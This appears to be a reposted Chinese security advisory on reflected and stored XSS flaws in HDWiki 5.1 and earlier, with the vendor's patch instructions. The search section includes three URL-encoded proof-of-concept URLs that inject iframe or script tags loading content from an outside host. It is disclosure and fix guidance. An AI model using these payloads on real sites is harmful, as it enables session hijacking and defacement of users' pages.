可csrf、劫持首页、蠕虫等,cog也在其列。 详细说明:由于偶尔原因发现cog存在wiki导致的xss可劫持首页,发现它的wiki是hdwiki的5.1版本。于是测试了其他的hdwiki发现存在同样的xss问题。 问题总结如下。 1. hdwiki的搜索有非持久xss,如: http://www.2cto.com /index.php?search-fulltext-title-%5C%22%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1
http://www.2cto.com /index.php?search-fulltext-title-%5C%22%3E%3Cscript%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%2Fq%26%2346%3Bjs%3E--all-0-within-time-desc-1 http://www.2cto.com /index.php?search-fulltext-title-TAG%3A%5C%22%3E%5C%27%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1
2. hdwiki编辑词条的存储型xss, http://www.2cto.com /index.php?doc-view-1572 http://www.2cto.com /thread-625-1-1.html 词条标题,词条标签,词条内容均存在服务端未过滤的问题。
3. hdwiki留言的存储型xss
修复方案: 过滤各种提交,修复编辑器,打补丁。 作者 random_ 官方修复方案: 漏洞 1、hdwiki编辑词条的存储型xss 漏洞 2、hdwiki的搜索有非持久xss 漏洞 3、HDWiki 任意用户密码修改漏洞 修复前须知:请提前做好代码备份工作,如您有做过二次开发,请对比代码,谨慎处理。 修复步骤: 1、请 下载 您对应编码版本的附件补丁包到本地并解压 2、拷贝附件中的doc.php,user.php,reference.php至/control/下面(覆盖原有文件) 3、(此步骤只针对HDWiki5.1版本的用户)拷贝附件中的editor.htm,viewdoc.htm至/view/default/下(覆盖原有文件) 4、拷贝附件中的hdwiki.js至/js/jqeditor/下(覆盖原有文件) 5、(此步骤只针对5.0UTF8版本的用户)拷贝附件中的install.php至/install/下(覆盖原有文件) 帖子内容如下: http://kaiyuan.hudong.com/bbs/viewthread.php?tid=115225&extra=page%3D1
查看更多关于互动维客HDWiki(5.1及以下)各种xss 0day - 网站安全的详细内容...